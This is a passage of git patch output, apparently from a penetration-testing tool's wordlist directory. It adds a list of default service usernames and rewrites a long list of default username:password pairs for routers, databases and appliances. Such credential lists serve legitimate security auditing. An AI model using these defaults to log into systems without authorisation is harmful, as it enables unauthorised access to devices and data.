+SYSTEM:SYSLIB +NETCON:NETCON +JONES:STEEL +author:author +MOESERV: +web:web +tech:User +PUBSUB1:PUBSUB1 +SYS:D_SYSPW +CATALOG:CATALOG +:IBM +:Guest +SQLUSER: +RE:RE +REPORTS_USER:OEM_TEMP +MFG:MFG +POST:POST +HPLASER:HPLASER +HR:HR +VIDEOUSER:VIDEO:USER +DBA:SQL +:CMOSPWD +guest1:guest +superuser:asante +SYSTEM:0RACLE38 +SYSTEM:0RACLE39 +AUTOLOG1: +dadmin:dadmin +AURORA$JIS$UTILITY$: +wlcsystem:wlcsystem +news: +CPRM: diff --git a/data/wordlists/default_users_for_services_unhash.txt b/data/wordlists/default_users_for_services_unhash.txt new file mode 100644 index 0000000000..c36f0e7e2b --- /dev/null +++ b/data/wordlists/default_users_for_services_unhash.txt @@ -0,0 +1,915 @@ +admin + +root +Administrator +sysadm +tech +operator +guest +security +debug +manager +service +!root +user +netman +super +diag +Cisco +Manager +DTA +apc +User +Admin +cablecom +adm +wradmin +netscreen +sa +setup +cmaker +enable +MICRO +login +write +monitor +netopia +op +adminview +sysadmin +echo +craft +maint +comcast +CSG +readonly +manuf +cusadmin +smc +sweex +disttech +su +poll +SYSDBA +anonymous +support +recovery +USERID +eng +administrator +NETWORK +JDE +Guest +rwa +USER +test +lp +ro +MAIL +ami +hsa +system +MGR +ADMINISTRATOR +FIELD +PBX +HELLO +hscroot +1502 +superuser +netrangr +readwrite +piranha +wlse +l3 +none +naadmin +public +NETOP +MANAGER +demo +D-Link +l2 +rw +cgadmin +storwatch +vcr +OPERATOR +MDaemon +jagadmin +enquiry +at4400 +davox +PFCUser +aaa +topicalt +admin2 +1234 +nms +client +sys +field +deskman +SYSADM +superadmin +pmd +GEN2 +ADMN +Factory +PRODDTA +tellabs +spcl +dadmin +helpdesk +dhs3mt +install +adfexc +IntraSwitch +manage +superman +SPOOLMAN +ADVMAIL +vt100 +PSEAdmin +patrol +teacher +PCUSER +Any +RSBCMON +cellit +inads +halt +locate +TMAR#HWMT8007079 +rapport +xbox +device +NICONEX +acc +31994 +bcim +websecadm +blue +topicnorm +supervisor +ccrusr +266344 +telecom +GEN1 +SSA +HTTP +mtch +bciim +browse +hydrasna +deskres +bbsd-client +replicator +intel +radware +intermec +mlusr +init +e250 +Polycom +temp1 +mac +3comcso +RMUser1 +WP +NAU +rcust +mtcl +topicres +bcnas +adminuser +Root +cac_admin +mediator +Anonymous +kermit +volition +GlobalAdmin +LUCENT01 +LUCENT02 +adminstat +desknorm +IntraStack +e500 +deskalt +cust +tiara +bcms +m1122 +telco +xd +dhs3pms +VNC +customer +cisco +adminstrator +ftp_nmc +me +iclock +scmadmin +installer +webadmin +ftp_inst +DDIC +SYSTEM +draytek +EARLYWATCH +super.super +ftp_oper +corecess +weblogic +system/manager +End +d.e.b.u.g +target +MD110 +tiger +adminttd +wlseuser +SAPCPIC +ftp_admi +default.password +7 +2 +ADMIN +itsadmin +PUBSUB +CTXSYS +ftp +bill +192.168.1.1 +setpriv +GUEST +SAP* +t3admin +hello +CISCO15 +1.79 +mso +Telecom +qsysopr +APPS +Developer +mail +qsecofr +11111 +Service +netadmin +any +db2fenc1 +johnson +isp +demos +QSRV +MDSYS +vpasp +TEST +QSECOFR +1 +informix +5 +engmode +scout +qpgmr +ADSL +images +Gearguy +Demo +serial# +BACKUP +stratacom +6.x +mary +COMPANY +SYS +DSL +Jetform +eagle +ROUTER +ods +siteadmin +Alphanetworks +Admin1 +janta +servlet +username +citel +Replicator +SYSMAN +master +SUPERUSER +cn=orcladmin +30 +maintainer +BRIO_ADMIN +internal +CQSCHEMAUSER +DEV2000_DEMOS +FSFTASK1 +checkfs +USER1 +SQLDBA +HELP +toor +qsrvbas +SYSADMIN +EZsetup +BATCH +STRAT_USER +primenet +OEMREP +USER6 +lynx +powerdown +$ALOC$ +password +VOL-0215 +tomcat +REP_MANAGER +WinCCConnect +ALLIN1 +DIRMAINT +eqadmin +QSRVBAS +AQJAVA +LASERWRITER +PERFSTAT +apcuser +MBWATCH +system_admin +unix +OWNER +NETPRIV +VSEMAINT +DEMO +SYMPA +REP_OWNER +DCL +FAX +ARCHIVIST +VTAMUSER +VMTAPE +basisk +NetLinx +OutOfBox +NETMGR +DEFAULT +OAS_PUBLIC +read +AP +MTSSYS +SYSMAINT +AUDIOUSER +Joe +IDMS +$SRV +snake +ROOT +PRINTER +shutdown +satan +RDM470 +trouble +fax +OP1 +admin@example.com +HOST +ADLDEMO +QS_ADM +bin +OPER +oracle +jj +PO7 +www +joe +MAINT +CMSBATCH +CCC +role1 +DATAMOVE +MSHOME +ISPVM +crowd­-openid-­server +user_editor +sedacm +db2admin +Airaya +SYSDUMP1 +IMEDIA +primos_cs +USER_TEMPLATE +pnadmin +lpadmin +VTAM +TRACESVR +POSTMASTER +MAILER +RSCSV2 +QS_WS +circ +nobody +Tasman +DISCOVERER_ADMIN +VMASMON +LR-ISDN +TURBINE +GL +PO +PRINT +MODTEST +GATEWAY +PRIMARY +both +haasadm +pw +games +DOCSIS_APP +bbs +EMP +postmaster +SITEMINDER +vgnadmin +RJE +gonzo +NEWS +AQUSER +UTLBSTATU +netbotz +xmi_demo +ORACACHE +MCUser +prash +sync +PM +AP2SVP +ibm +ULTIMATE +SABRE +user_pricer +SUPERVISOR +EVENT +PORTAL30_SSO_PS +FSFADMIN +OO +WKSYS +OPERATNS +UVPIM_ +OE +OCITEST +web +ESSEX +None +CTXDEMO +user_designer +QDBA +role +LRISDN +tele +WEBCAL01 +rsadmin +OMWB_EMULATION +WINDOWS_PASSTHRU +MOREAU +fast +host +ORDPLUGINS +SYSWRM +savelogs +SDOS_ICSAP +DSSYS +MGWUSER +TDOS_ICSAP +ssp +EJSADMIN +INGRES +DS +estheralastruey +VCSRV +ssladmin +CLARK +OEMADM +restoreonly +quser +MILLER +trmcnfg +REPORT +user_author +dpn +tour +mountfsys +http +PROG +openfiler +RAID +STARTER +FAXUSER +DSA +daemon +mountsys +backuponly +IVPM1 +USER3 +OPENSPIRIT +prime +HPLASER +CSPUSER +qsvr +SYSCKP +Sysop +user_marketer +IMAGEUSER +bsxuser +MASTER +USER9 +OLAPSYS +rje +ODM_MTR +QS_ES +lansweeperuser +DEMO3 +Username +GPLD +uucp +DBSNMP +VMARCH +SWUSER +Operator +CHEY_ARCHSVR +roo +n.a +accounting +backuprestore +dni +WEBADM +iceman +guru +anon +USER8 +PORTAL30_SSO_PUBLIC +postgres +WINSABRE +USERP +IVPM2 +PORTAL30_SSO +ALLIN1MAIL +POST +TEMP +BATCH1 +PROMAIL +SECDEMO +ARAdmin +sadmin +ORAREGSYS +VMASSYS +man +FROSTY +LASER +tutor +DISKCNT +default +SYSERR +WWW +VAX +PROCAL +FAXWORKS +LDAP_Anonymous +(any +setup/snmp +DSGATEWAY +AWARD_SW +CSMIG +umountfsys +VMS +bpel +viewuser +TDISK +politically +user_analyst +RSCS +COMPIERE +OSP22 +guest1 +FORSE +factory +bubba +QUSER +primeos +glftpd +RMAN +mountfs +DIRECT +firstsite +IPFSERV +TSUSER +BATCH2 +snmp +WebAdmin +IBMUSER +SMART +voadmin +BC4J +core +OPERVAX +Bobo +WANGTEK +OWA +USER2 +jasperadmin +VMBSYSAD +PVM +ctb_admin +  +DEMO4 +qsrv +superdba +PORTAL30 +XPRT +Crowd +18364 +ilom-admin +rdc123 +sysopr +tasman +blank +WEBREAD +ODM +11111111 +AURORA$ORB$UNAUTHENTICATED +ADAMS +Craft +rfmngr +SYSTEST_CLIG +user_approver +ilom-operator +Nice-admin +answer +NETNONPRIV +nuucp +CIDS +VASTEST +redline +MBMANAGER +webmaster +APPLSYS +USER4 +hqadmin +UOMNI_ +VMUTIL +uucpadm +EXFSYS +4Dgifts +JMUSER +CIS +UNITY_ +HLW +pwrchute +IDMSSE +NSA +TELEDEMO +recover +TRAVEL +lexar +viewer +LIBRARY +PO8 +root@localhost +NAMES +secofr +PDMREMI +MGE +USER7 +OWA_PUBLIC +questra +builtin +SFCNTRL +boss +PLEX +OLAPDBA +OLAPSVR +user_expert +Bhosda +gropher +TAHITI +NEWINGRES +VM3812 +VIF_DEVELOPER +joeuser +IPC +HELPDESK +wlpisystem +TSAFVM +prtgadmin +UAMIS_ +theman +CISINFO +mobile +QS_CB +CDEMORID +DEMO2 +PORTAL30_PUBLIC +MDDEMO_CLERK +PHANTOM +ODS +BLAKE +TSDEV +PRODBM +dos +APL2PP +god1 +CICSUSER +22222222 +user_publisher +OSE$HTTP$ADMIN +def +SuperUser +QS_CBADM +SYSA +STUDENT +Draytek +SMDR +EREP +VSEMAN +fwadmin +MTS_USER +AQDEMO +private +IS_$hostname +HPSupport +ORASSO +CVIEW +SH +XXSESS_MGRYY +VMMAP +PORTAL30_DEMO +Ezsetup +QS_CS +CMSUSER +DEMO1 +userNotUsed +ncadmin +TESTPILOT +fg_sysadmin +UETP +QS +DBI +JWARD +APPS_MRC +Moe +SENTINEL +Yak +PDP11 +Flo +SLIDE +INFO +checkfsys +PRODCICS +MXAGENT +VMTLIBR +POWERCARTUSER +VMBACKUP +CPNUC +distrib +MIGRATE +CDEMOUCB +OLTSEP +sysbin +signa +autocad +WEBDB +ncrm +SAMPLE +HCPARK +ALLINONE +nm2user +SAVSYS +IIPS +PATROL +mailadmin +TMSADM +ESubscriber +software +god2 +FSFTASK2 +ORDSYS +gopher +PSFMAINT +EAdmin +12345 +DECNET +OPERATIONS +$system +PANAMA +LIBRARIAN +fal +NETSERVER +POWERCHUTE +USER5 +GPFD +QS_OS +REPADMIN +0 +DEMO8 +DEMO9 +CDEMO82 +umountsys +USER0 +CDEMOCOR +SYSTEST +Rodopi +user_checker +qserv +AQ +SAPR3 +VRR1 +fastwire +admi +FINANCE +WinCCAdmin +ESTOREUSER +VIRUSER +LINK +APPLSYSPUB +overseer +checksys +umountfs +DBDCCICS +TOAD +ntpupdate +MDDEMO_MGR +billy-bob +DECMAIL +alien +nsroot +AdvWebadmin +dvstation +SERVICECONSUMER1 +MMO2 +NOC +WWWUSER +SAP +NEVIEW +ODSCOMMON +pixadmin +ripeop +PENG +netlink +L2LDEMO +OUTLN +12.x +scott +dbase +fam +Oper +RMAIL +FND +PRIV +SETUP +news +VSEIPO +ilon +PLSQL +politcally +18140815 +APPUSER +CENTRA +LBACSYS +PDP8 +SFCMI +lpadm +Test +bewan +DIP +mfd +MDDEMO +SWPRO +DES +Coco +GCS +rodopi +Scott +Admin5 +ANDY +DESQUETOP +NETCON +JONES +author +MOESERV +PUBSUB1 +CATALOG +SQLUSER +RE +REPORTS_USER +MFG +HR +VIDEOUSER +DBA +AUTOLOG1 +AURORA$JIS$UTILITY$ +wlcsystem +CPRM From d7bf66973c86910730b88b9a02591bec62e69a49 Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi Date: Sun, 18 May 2014 18:13:03 +0200 Subject: [PATCH 19/33] Fixed userpass delimiters. --- .../default_userpass_for_services_unhash.txt | 3574 ++++++++--------- 1 file changed, 1787 insertions(+), 1787 deletions(-) diff --git a/data/wordlists/default_userpass_for_services_unhash.txt b/data/wordlists/default_userpass_for_services_unhash.txt index 8610e57e07..ff0458f94b 100644 --- a/data/wordlists/default_userpass_for_services_unhash.txt +++ b/data/wordlists/default_userpass_for_services_unhash.txt @@ -1,1787 +1,1787 @@ -admin:admin -: -admin: -:admin -admin:password -admin:1234 -root: -Administrator:admin -admin:epicrouter -sysadm:sysadm -:1234 -:password -:access -root:root -tech:tech -:smcadmin -:0 -Administrator: -root:pass -:system -root:admin -:PASSWORD -:Symbol -operator: -guest:guest -admin:bintec -security:security -guest: -debug:synnet -manager:manager -:adtran -admin:motorola -service:smile -:cascade -admin:0 -!root: -user:password -:BRIDGE -netman:netman -super:super -admin:switch -admin:setup -admin:changeme -diag:switch -operator:operator -user:user -user: -Cisco:Cisco -Manager:Manager -DTA:TJM -apc:apc -tech: -:cisco -User: -root:1234 -Admin: -:letmein -cablecom:router -adm: -wradmin:trancell -:ascend -manager:friend -:NetICs -root:blender -netscreen:netscreen -:sysadm -:SKY_FOX -sa: -:public -:Master -setup:setup -root:default -:laflaf -cmaker:cmaker -enable: -MICRO:RSX -login:admin -:Posterie -write:private -root:attack -monitor:monitor -:private -:xdfk9874t3 -netopia:netopia -:Col2ogro2 -admin:microbusiness -op:op -adminview:OCS -op:operator -admin:secure -admin:atlantis -sysadmin:sysadmin -super:5777364 -echo:echo -craft: -adm:cascade -admin:default -maint:maint -comcast:1234 -CSG:SESAME -diag:danger -readonly:lucenttech2 -admin:operator -Manager: -debug:d.e.b.u.g -admin:hello -:SYSTEM -root:ascend -root:calvin -manuf:xxyyzz -cusadmin:highspeed -admin:123 -smc:smcadmin -admin:Sharp -root:password -sweex:mysweex -disttech:4tas -su:super -admin:system -root:changeme -poll:tech -sysadmin:password -SYSDBA:masterkey -anonymous: -:0000 -root:permit -admin:barricade -support:support -root:tslinux -admin:hp.com -recovery:recovery -USERID:PASSW0RD -eng:engineer -administrator:administrator -admin:pwp -admin:isee -NETWORK:NETWORK -JDE:JDE -admin:superuser -Guest: -:Super -admin:admin123 -super:surt -rwa:rwa -admin:123456 -admin:NetCache -:ADTRAN -USER:USER -test:test -admin:extendnet -admin:ironport -lp:lp -:Cisco -administrator: -admin:1111 -sysadmin:PASS -ro:ro -admin:Ascend -:_Cisco -MAIL:MAIL -ami: -:sitecom -hsa:hsadb -system:password -MGR:CAROLIAN -ADMINISTRATOR:ADMINISTRATOR -admin:sysAdmin -root:tini -admin:smcadmin -:Helpdesk -FIELD:SERVICE -PBX:PBX -netman: -HELLO:FIELD.SUPPORT -system:sys -hscroot:abc123 -1502:1502 -:star -superuser:admin -HELLO:MGR.SYS -sysadm:anicust -Administrator:Administrator -netrangr:attack -:Intel -:12345 -readwrite:lucenttech1 -:secret -piranha:piranha -wlse:wlsedb -admin:cisco -l3:l3 -admin:diamond -none:admin -naadmin:naadmin -public:public -admin:1988 -admin:radius -admin:root -NETOP: -Administrator:letmein -HELLO:MANAGER.SYS -:raidzone -:3ascotel -MANAGER:HPOFFICE -demo:demo -:166816 -User:Password -admin:zoomadsl -D-Link:D-Link -user:public -user:pass -l2:l2 -MGR:CCC -rw:rw -cgadmin:cgadmin -storwatch:specialist -:secure -vcr:NetVCR -OPERATOR:COGNOS -piranha:q -admin:synnet -MDaemon:MServer -root:cms500 -root:davox -jagadmin: -enquiry:enquirypw -at4400:at4400 -support:h179350 -davox:davox -admin:asd -PFCUser:240653C9467E45 -setup:changeme -superuser:superuser -:atc123 -aaa: -root:admin_1 -:266344 -MGR:WORD -topicalt:password -admin2:changeme -1234:1234 -MANAGER:ITF3000 -:connect -FIELD:HPONLY -nms:nmspw -client:client -admin:comcomcom -:speedxess -MGR:ROBELLE -:epicrouter -sys:uplink -OPERATOR:SYSTEM -field:support -MGR:SYS -root:letacla -:FORCE: -deskman:changeme -MAIL:REMOTE -SYSADM:sysadm -superadmin:secret -:backdoor -pmd: -MGR:CNAS -admin:22222 -GEN2:gen2 -:medion -ADMN:admn -Factory:56789 -PRODDTA:PRODDTA -tellabs:tellabs#1 -spcl:0 -dadmin:dadmin01 -:comcomcom -administrator:password -helpdesk:OCS -dhs3mt:dhs3mt -MGR:SECURITY -setup:changeme! -install:llatsni -adfexc:adfexc -IntraSwitch:Asante -manage:!manage -superman:21241036 -MANAGER:TELESUP -craft:crftpw -login:0 -:help -MGR:HPOFFICE -:lantronix -SPOOLMAN:HPOFFICE -manager:admin -:netadmin -ADVMAIL:HP -FIELD:SUPPORT -MANAGER:SYS -MGR:VESOFT -vt100:public -PSEAdmin:$secure$ -HELLO:OP.OPERATOR -Manager:friend -:hs7mwxkk -patrol:patrol -:SUPER -:SMDR -:1064 -teacher:password -PCUSER:SYS -MGR:ITF3000 -Any:12345 -OPERATOR:DISC -RSBCMON:SYS -cellit:cellit -MGR:INTX3 -inads:inads -halt:tlah -root:wyse -locate:locatepw -admin:visual -TMAR#HWMT8007079: -rapport:r@p8p0r+ -MGR:TELESUP -xbox:xbox -:TENmanUFactOryPOWER -device:device -NICONEX:NICONEX -admin:admin1234 -root:fivranne -acc:acc -31994:31994 -admin:netadmin -bcim:bcimpw -websecadm:changeme -blue:bluepw -topicnorm:password -supervisor:PlsChgMe -:R1QTPS -MGR:HPONLY -ccrusr:ccrusr -root:Cisco -login:password -266344:266344 -MAIL:MPE -telecom:telecom -MAIL:HPOFFICE -GEN1:gen1 -Administrator:smcadmin -SSA:SSA -:snmp-Trap -HTTP:HTTP -:default -mtch:mtch -admin:adslolitec -Administrator:ganteng -bciim:bciimpw -browse:browsepw -Admin:Admin -:Password -hydrasna: -sys:change_on_install -deskres:password -bbsd-client:changeme2 -anonymous:Exabyte -admin:rmnetlm -replicator:replicator -intel:intel -OPERATOR:SUPPORT -MGR:HPP196 -radware:radware -intermec:intermec -mlusr:mlusr -MGR:RJE -FIELD:LOTUS -init:initpw -e250:e250changeme -MAIL:TELESUP -Polycom:SpIp -temp1:password -:adminttd -tech:field -support:supportpw -mac: -:MiniAP -MANAGER:SECURITY -3comcso:RIP000 -RMUser1:password -WP:HPOFFICE -Administrator:changeme -MGR:XLSERVER -MGR:HPP187 -MGR:HPP189 -inads:indspw -admin:linga -craft:craft -:enter -NAU:NAU -rcust:rcustpw -admin:AitbISP4eCiG -mtcl:mtcl -MGR:CONV -topicres:password -bcnas:bcnaspw -MGR:NETBASE -admin:access -public: -adminuser:OCS -MGR:REGO -Root: -cac_admin:cacadmin -mediator:mediator -superman:talent -Anonymous: -kermit:kermit -admin:x-admin -MGR:HPDESK -:9999 -root:ROOT500 -admin:my_DEMARC -volition:volition -GlobalAdmin:GlobalAdmin -:4getme2 -LUCENT01:UI-PSWD-01 -admin:2222 -LUCENT02:UI-PSWD-02 -MANAGER:TCH -adminstat:OCS -desknorm:password -IntraStack:Asante -OPERATOR:SYS -MGR:COGNOS -:Fireport -:ILMI -maint:maintpw -supervisor:supervisor -e500:e500changeme -admin:mu -MANAGER:COGNOS -deskalt:password -admin:OCS -bbsd-client:NULL -cust:custpw -admin:noway -tiara:tiaranet -bcms:bcmspw -:TANDBERG -m1122:m1122 -telco:telco -superuser: -xd:xd -dhs3pms:dhs3pms -VNC:winterm -craft:craftpw -maint:rwmaint -anonymous:any@ -login:access -browse:looker -customer:none -cisco:cisco -adminstrator:changeme -FIELD:MANAGER -:1234admin -FIELD:MGR -ftp_nmc:tuxalize -me: -iclock:timely -echo:User -ADVMAIL:HPOFFICE:DATA -login:1111 -login:8429 -Administrator:manage -:Babylon -admin:hagpolm1 -root:12345 -scmadmin:scmchangeme -user:tivonpw -sysadm:Admin -Administrator:password -admin:administrator -installer:installer -webadmin:webadmin -ftp_inst:pbxk1064 -DDIC:19920706 -:pento -admin:NetSurvibox -SYSTEM:D_SYSTPW -draytek:1234 -:3477 -operator:$chwarzepumpe -administrator:asecret -EARLYWATCH:SUPPORT -:10023 -Manager:Admin -super.super: -ftp_oper:help1954 -corecess:corecess -superuser:123456 -admin:Password -super.super:master -admin:Protector -SYSTEM:MANAGER -webadmin:1234 -install:secret -FIELD:HPWORD:PUB -admin:12345 -admin:symbol -weblogic:weblogic -Admin:1988 -system/manager:sys/change_on_install -root:3ep5w2u -:8111 -:jannie -End:User:123 -none:0 -d.e.b.u.g:User -admin:tomcat -target:password -Administrator:pilou -MD110:help -Administrator:3ware -:ANYCOM -tiger:tiger123 -adminttd:adminttd -admin:asante -admin:smallbusiness -admin:netscreen -FIELD:HPP187:SYS -guest:User -maint:ntacdmax -admin:w2402 -wlseuser:wlsepassword -SAPCPIC:admin -ftp_admi:kilo1987 -admin:articon -mtcl: -default.password: -admin:michelangelo -manager:changeme -root:Mau'dib -:Serial:Num -root:ggdaseuaimhrke -7:maintain -2:syslib -ADMIN:admin -system:weblogic -Administrator:ggdaseuaimhrke -ADMIN: -itsadmin:init -PUBSUB:PUBSUB -admin:demo -system:manager -sys:sys -CTXSYS:CTXSYS -ftp: -bill:bill -192.168.1.1:60020:@dsl_xilno -FIELD: -admin:dmr99 -setpriv:system -GUEST:GUEST -SAP*:06071992 -operator:1234 -t3admin:Trintech -hello:hello -supervisor: -CISCO15:otbu+1 -1.79:Multi -:babbit -mso:w0rkplac3rul3s -Telecom:Telecom -qsysopr:qsysopr -admin:TANDBERG -admin:imss7.0 -:nokia -APPS:APPS -Developer:isdev -mail:mail -admin:draadloos -qsecofr:qsecofr -11111:x-admin -:default.password -Service:5678 -enable:cisco -netadmin:nimdaten -Polycom:456 -admin:P@55w0rd! -admin:1234admin -root:par0t -any:system -db2fenc1:db2fenc1 -johnson:control -2:maintain -isp:isp -demos: -QSRV:QSRV -root:iDirect -MDSYS:MDSYS -Admin:123456 -2:manager -vpasp:vpasp -TEST:TEST -:Telecom -QSECOFR:QSECOFR -adm:none -:2501 -1:syslib -system:security -admin:leviton -!root:blank -informix:informix -root:mpegvideo -5:games -root:0P3N -engmode:hawk201 -scout:scout -qpgmr:qpgmr -admin:admin000 -ADSL:expert03 -cisco: -images:images -admin:security -admin:surecom -Gearguy:Geardog -:symantec -comcast: -admin:adslroot -1:manager -Demo: -:xyzzy -Administrator:adaptec -system:system -SAP*:PASS -serial#:serial# -BACKUP:BACKUP -stratacom:stratauser -root:rootme -6.x: -root:!root -webadmin:webibm -:riverhead -mary:password -COMPANY:COMPANY -SYS:SYS -DSL:DSL -Jetform: -none:amber -eagle:eagle -ROUTER: -root:brightmail -admin:pass -:HEWITT:RAND -ods:ods -siteadmin:toplayer -admin:OkiLAN -root:rootpass -Alphanetworks:wrgg15_di524 -:x40rocks -:nokai -Admin1:Admin1 -field:field -Admin:admin -Admin:ImageFolio -:iolan -:manager -admin:pfsense -janta:sales:janta211 -servlet:manager -username:password -citel:password -Replicator:iscopy -SYSMAN:OEM_TEMP -1:operator -SYSTEM:SYSTEM -administrator:RSAAppliance -master:themaster01 -Admin:1234 -2:operator -SUPERUSER:ANS#150 -admin:passwort -cn=orcladmin:welcome -30:games -maintainer:admin -setup: -:hello -admin:NetSeq -BRIO_ADMIN:BRIO_ADMIN -:citel -internal:oracle -CQSCHEMAUSER:PASSWORD -root:kn1TG7psLu -SYS:SYSPASS -:lkwpeter -DEV2000_DEMOS:DEV2000_DEMOS -FSFTASK1: -checkfs:checkfs -BACKUP: -USER1:USER1 -root:TENmanUFactOryPOWER -SQLDBA: -root:resumix -HELP:HELP -toor:logapp -SYS:0RACLE9 -SYS:0RACLE8 -:57gbzb -!root:none -qsrvbas:qsrvbas -SYSADMIN: -EZsetup: -Administrator:1234 -:sldkj754 -BATCH: -STRAT_USER:STRAT_PASSWD -Administrator:19750407 -:User -user:USERP -primenet:primeos -OEMREP:OEMREP -admin:[^_^] -USER6:USER6 -lynx: -:TTPTHA -powerdown:powerdown -root:Mau’dib -SYSTEM:ORACL3 -$ALOC$: -password: -VOL-0215: -admin:nimda -tomcat:tomcat -REP_MANAGER:DEMO -WinCCConnect:2WSXcder -ALLIN1:ALLIN1 -DIRMAINT: -eqadmin::Serial:port:only:equalizer -sysadm:sysadmpw -QSRVBAS:QSRVBAS -admin:ip305Beheer -debug:tech -:ACCORD -AQJAVA:AQJAVA -LASERWRITER:LASERWRITER -Administrator:0000 -root:nsi -PERFSTAT:PERFSTAT -apcuser:apc -MBWATCH:MBWATCH -:protection -system_admin: -unix:unix -OWNER:OWNER -NETPRIV:NETPRIV -VSEMAINT: -:AWARD?SW -DEMO:DEMO -tomcat:changethis -SYMPA:SYMPA -REP_OWNER:REP_OWNER -DCL:DCL -FAX: -root:dbps -ARCHIVIST:ARCHIVIST -USER:PASSWORD -VTAMUSER: -LASERWRITER: -VMTAPE: -basisk:basisk -NetLinx:password -OutOfBox:demos:guest:4DGifts:(none:by:default) -none:letmein -NETMGR:NETMGR -DEFAULT:USER -OAS_PUBLIC:OAS_PUBLIC -read: -AP:AP -demos:demos -SYSTEM:Admin -admin:j5Brn9 -MTSSYS:MTSSYS -SYSMAINT:DIGITAL -AUDIOUSER:AUDIOUSER -Joe:hello -IDMS: -:teX1 -admin:allot -$SRV:$SRV -snake: -SYS:0RACLE -ADVMAIL: -Administrator:nicecti -ROOT:ROOT -PRINTER:PRINTER -shutdown: -satan: -:m1link -RDM470: -master:access -:l2 -:l1 -trouble:trouble -fax: -OP1: -admin@example.com:admin -root:trendimsa1.0 -HOST:HOST -ADLDEMO:ADLDEMO -QS_ADM:QS_ADM -bin:sys -:AMI -OPER:OPER -oracle: -jj: -PO7:PO7 -SYSTEM:0RACLE8 -SYSTEM:0RACLE9 -www: -joe:password -:komprie -:123 -MAINT:MAINT -CMSBATCH: -root:toor -CCC: -role1:tomcat -DATAMOVE: -lp: -:AMISETUP -:sp99dd -halt:halt -MSHOME:MSHOME -ISPVM: -crowd­-openid-­server:password -user_editor:demo -sedacm:secacm -ROOT: -Admin:3Com -db2admin:db2admin -Airaya:Airaya -supervisor:visor -none:Wireless -SYSDUMP1: -IMEDIA:IMEDIA -:Biostar -install:install -primos_cs:primos -admin:infrant1 -Administrator:Partner -:Administrative -USER_TEMPLATE:USER_TEMPLATE -pnadmin:pnadmin -:h6BB -lpadmin:lpadmin -guest:none -VTAM:VTAM -TRACESVR:TRACE -POSTMASTER:POSTMASTER -MAILER:MAILER -RSCSV2: -QS_WS:QS_WS -:sma -system_admin:system_admin -circ: -Demo:password -:rwa -nobody:nobody -Tasman:Tasmannet -admin:!admin -DISCOVERER_ADMIN:DISCOVERER_ADMIN -VMASMON: -LR-ISDN:LR-ISDN -TURBINE:TURBINE -GL:GL -PO:PO -:AMI_SW -super:superpass -PRINT: -MODTEST:YES -GATEWAY:GATEWAY -root:system -PRIMARY:PRIMARY -both:tomcat -:award.sw -haasadm:lucy99 -pw:pwpw -games:games -DOCSIS_APP:3Com -bbs: -EMP:EMP -Admin:cclfb -postmaster: -SITEMINDER:SITEMINDER -Any:Any -vgnadmin:vgnadmin -RJE:RJE -gonzo: -NEWS:NEWS -sa:Ektron -:Award -AQUSER:AQUSER -UTLBSTATU:UTLESTAT -:AMIAMI -netbotz:netbotz -CTXSYS:CHANGE_ON_INSTALL -xmi_demo:sap123 -:Crystal -:Daewuu -ftp:ftp -ORACACHE:(random:password) -MCUser:MCUser1 -prash:hello -sync: -sysadm:admpw -root:rootadmin -PM:PM -AP2SVP: -master:master -ibm:2222 -ULTIMATE:ULTIMATE -SABRE: -role1:role1 -user_pricer:demo -admin:enhydra -SUPERVISOR:NF -EVENT:EVENT -:xyzall -:rainbow -ADMIN:JETSPEED -SYS:ORACL3 -PORTAL30_SSO_PS:PORTAL30_SSO_PS -FSFADMIN: -OO:OO -WKSYS:WKSYS -OPERATNS:OPERATNS -:ksdjfg934t -UVPIM_: -:merlin -OE:OE -Any:Local:User:Local:User:password -OCITEST:OCITEST -web: -:HLT -ADMINISTRATOR:admin -ESSEX: -:last -CTXSYS: -None:xyzzy -CTXDEMO:CTXDEMO -user_designer:demo -:Admin -:zebra -QDBA:QDBA -role:changethis -LRISDN:LRISDN -tele:tele -WEBCAL01:WEBCAL01 -rsadmin:rsadmin -OMWB_EMULATION:ORACLE -root:alien -WINDOWS_PASSTHRU: -:sanfran -public:ReadOnly:access:secret -:AMIPSWD -MOREAU:MOREAU -fast:abd234 -root:QNX -host:dnnhost -administrator:root -admin:public -SYSTEM:ORACLE -:sertafu -ORDPLUGINS:ORDPLUGINS -SYSWRM: -mail: -:telos -ADMIN:ADMIN -administrator:adminpass -savelogs:crash -:ACCESS -SDOS_ICSAP:SDOS_ICSAP -system:adminpwd -BATCH:BATCH -GUEST:GUESTGUEST -SYSMAINT:SYSMAINT -postmaster:postmast -DSSYS:DSSYS -:award_ps -:ZAAADA -MGWUSER:MGWUSER -:NTCIP -OPERATOR: -:hewlpack -TDOS_ICSAP:TDOS_ICSAP -ssp:ssp -EJSADMIN:EJSADMIN -:damin -INGRES:INGRES -DS: -:A.M.I -estheralastruey: -:1322222 -VCSRV:VCSRV -Administrator:storageserver -ssladmin:ssladmin -CLARK:CLOTH -shutdown:shutdown -administrator:1234 -OEMADM:OEMADM -restoreonly:restoreonly1 -quser:quser -PRINTER: -MILLER:MILLER -trmcnfg:trmcnfg -REPORT:REPORT -user_author:demo -:aLLy -dpn:changeme -tour:tour -mountfsys:mountfsys -http: -PROG:PROG -:iwill -openfiler:password -:Public -admin:mp3mystic -RAID:hpt -read:synnet -admin:peribit -STARTER:STARTER -FAXUSER: -GUEST:GUESTGUE -DSA: -:guardone -daemon:daemon -mountsys:mountsys -SYSTEM:ORACLE9 -SYSTEM:ORACLE8 -:gandalf -backuponly:backuponly1 -IVPM1: -:leaves -sysadm:syspw -root:blablabla -:Compleri -USER3:USER3 -OPENSPIRIT:OPENSPIRIT -:spooml -:changeit -:wg -prime:primeos -HPLASER: -:Vextrex -CSPUSER: -qsvr:qsvr -lynx:lynx -SYSCKP: -root:letmein -Sysop:Sysop -user_marketer:demo -IMAGEUSER:IMAGEUSER -root:Password -bsxuser:bsxpass -MASTER:PASSWORD -USER9:USER9 -root:ax400 -OLAPSYS:MANAGER -SYSTEM:OPERATOR -oracle:oracle -root:Mau?dib -:MASTER -root:t00lk1t -rsadmin: -:Daytec -OutOfBox: -:SZYX -:cmaker -:CTX_123 -rje:rje -ODM_MTR:MTRPW -QS_ES:QS_ES -lansweeperuser:mysecretpassword0* -DEMO3: -Username:password -GPLD:GPLD -uucp:uucp -DBSNMP:DBSNMP -VMARCH: -GUEST:TSEUG -SWUSER:SWUSER -root:8RttoTriz -VTAM: -OPERATNS: -Operator:Operator -CHEY_ARCHSVR: -SYS:ORACLE -roo:honey -n.a:guardone -accounting:accounting -backuprestore:backuprestore1 -PRINT:PRINT -:j322 -:Craftr4 -dni:dni 